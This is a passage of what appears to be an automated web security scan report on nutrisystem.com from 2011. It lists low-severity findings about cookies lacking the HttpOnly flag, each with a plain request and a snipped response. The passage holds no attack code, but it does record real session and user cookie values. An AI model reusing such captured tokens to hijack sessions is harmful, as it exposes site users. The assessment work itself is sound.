Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/json;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:57:26 GMT
Connection: close

{"status":"ERROR","success_message":"<script type=\"text/javascript\">\r\n\t$(document).ready(function(){\r\n\t init(); // function to trigger ajax functionality\r\n\t}); \r\n<\/script>\r\n\r\n\r\
...[SNIP]...

6.36. http://www.nutrisystem.com/jsps_hmr/guided_selling/ajaxSuccessUrl.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/guided_selling/ajaxSuccessUrl.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/guided_selling/ajaxSuccessUrl.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/json;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:57:27 GMT
Connection: close

{"status":"SUCCESS","success_message":"<script type=\"text/javascript\">\r\n\t$(document).ready(function(){\r\n\t init(); // function to trigger ajax functionality\r\n\t}); \r\n<\/script>\r\n\r\n\
...[SNIP]...

6.37. http://www.nutrisystem.com/jsps_hmr/guided_selling/gs_template_profile.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/guided_selling/gs_template_profile.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/guided_selling/gs_template_profile.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:28 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:28 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:57:27 GMT
Connection: close

<script type="text/javascript">
$(document).ready(function(){
Bfeed();
});
</script>
<body>
<script type="text/javascript" src="/js/guided-selling/guided-selling/wz_tooltip.js"></script>
<fo
...[SNIP]...

6.38. http://www.nutrisystem.com/jsps_hmr/help/contact.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/help/contact.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/help/contact.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:28 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:28 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:57:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type"
...[SNIP]...

6.39. http://www.nutrisystem.com/jsps_hmr/help/site_map.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/help/site_map.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/help/site_map.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:28 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:28 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:57:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type"
...[SNIP]...

6.40. http://www.nutrisystem.com/jsps_hmr/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/home/ HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:42 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:42 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:42 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...

6.41. http://www.nutrisystem.com/jsps_hmr/home/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/home/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:40 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...

6.42. http://www.nutrisystem.com/jsps_hmr/how_it_works/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/how_it_works/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/how_it_works/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:30 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:30 GMT; Path=/
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <!-- Defect #671 - Need to inclu
...[SNIP]...

6.43. http://www.nutrisystem.com/jsps_hmr/nutrisystemd/hcp/healthcare_professionals.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/nutrisystemd/hcp/healthcare_professionals.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/nutrisystemd/hcp/healthcare_professionals.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:31 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:31 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="dj_gecko dj_ff3 dj_contentbox dj_gecko
...[SNIP]...

6.44. http://www.nutrisystem.com/jsps_hmr/privacy/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/privacy/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/privacy/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:31 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:31 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

6.45. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/shop/order_now.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/shop/order_now.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:51 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
       <meta http-equiv="P3P"
...[SNIP]...

6.46. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/success_stories/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/success_stories/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; 